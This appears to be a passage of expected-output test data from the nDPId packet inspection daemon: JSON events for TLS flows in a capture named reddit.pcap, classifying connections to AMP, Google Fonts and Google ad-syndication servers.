-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9293,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1605291690952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690952,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu21pGefV\/3l9HVoBJXgDRiAAACBAV4AQMDAwQCCArC10u2GsMWnw=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9294,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1605291690952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690952,"pkt":"qtsDr8lk5EKm5WPyht1gDDgdACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttYBu\/eX0dWRnn1ggBAB+7hZAAABAQgKGsMWucLXS7Y="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9298,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690953,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9300,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22KVwltPCUkXloBJXgMhIAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9301,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDtx5ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttgBu8JSReWlcJbUgBAB+0w+AAABAQgKGsMWu8LXS70="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9302,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu22it1t9ZMt7NvoBJXgClQAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9303,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690954,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23LTmo6vQxszqoBJXgBZ9AAACBAV4AQMDAwQCCArC10u9GsMWnw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9304,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gDhnPACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttoBu0y3s28rdbfXgBAB+61FAAABAQgKGsMWu8LXS70="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9305,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690954,"pkt":"qtsDr8lk5EKm5WPyht1gAc2lACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABttwBu9DGzOq05qOsgBAB+5pyAAABAQgKGsMWu8LXS70="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9306,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9307,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690954,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690954,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9308,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9309,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgIAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbu23lfa6eczuyRVoBJXgHLsAAACBAV4AQMDAwQCCArC10u9GsMWnw=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9310,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gClWEACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACABtt4BuzO7JFVX2unogBAB+\/bgAAABAQgKGsMWvMLXS70="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9311,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690955,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgRAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuVFgHH2llkCsoHoBJXgJ6iAAACBAV4AQMDAwQCCArC10u9qlQMrQ=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9312,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690955,"pkt":"qtsDr8lk5EKm5WPyht1gBhSQACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAKlRYBu2QKygcBx9pagBAB+yKXAAABAQgKqlQMysLXS70="} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9313,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9314,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690955,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9315,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZEy\/C8or4r7coBJXgC2BAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9316,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690956,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQZgWfUkJjbNefoBJXgN3ZAAACBAV4AQMDAwQCCArC10u+uJU7NA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9317,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gBnVWACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGQBuyvivtxMvwvLgBAB+7F0AAABAQgKuJU7UsLXS74="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9318,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690956,"pkt":"qtsDr8lk5EKm5WPyht1gDhWZACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGYBu2Ns158Fn1JDgBAB+2HNAAABAQgKuJU7UsLXS74="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9319,"source":"reddit.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36964,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9320,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690956,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9321,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQan0Owi4YaAsmoBJXgA33AAACBAV4AQMDAwQCCArC10u\/uJU7NA=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9322,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690957,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgPAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbuQaPhCx3meEC1CoBJXgOW1AAACBAV4AQMDAwQCCArC10u+uJU7NA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9323,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gCQMiACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGoBuxhoCyZ9DsIvgBAB+5HpAAABAQgKuJU7U8LXS78="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9324,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690957,"pkt":"qtsDr8lk5EKm5WPyht1gB5miACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGgBu54QLUL4Qsd6gBAB+2moAAABAQgKuJU7U8LXS74="} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9325,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9326,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690926,"flow_last_seen":1605291690957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690957,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tpc.googlesyndication.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690990,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690992,"flow_last_seen":1605291690992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690992,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9357,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1605291690992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690992,"pkt":"qtsDr8lk5EKm5WPyht1gDPazACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDwAAAAAAACABkGwBu4uuzGcAAAAAoAL9IIFCAAACBAWgBAIICriVO3YAAAAAAQMDBw=="} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9359,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690994,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690994,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9373,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690996,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690996,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00982{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9391,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690926,"flow_last_seen":1605291690998,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690998,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cdn.ampproject.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 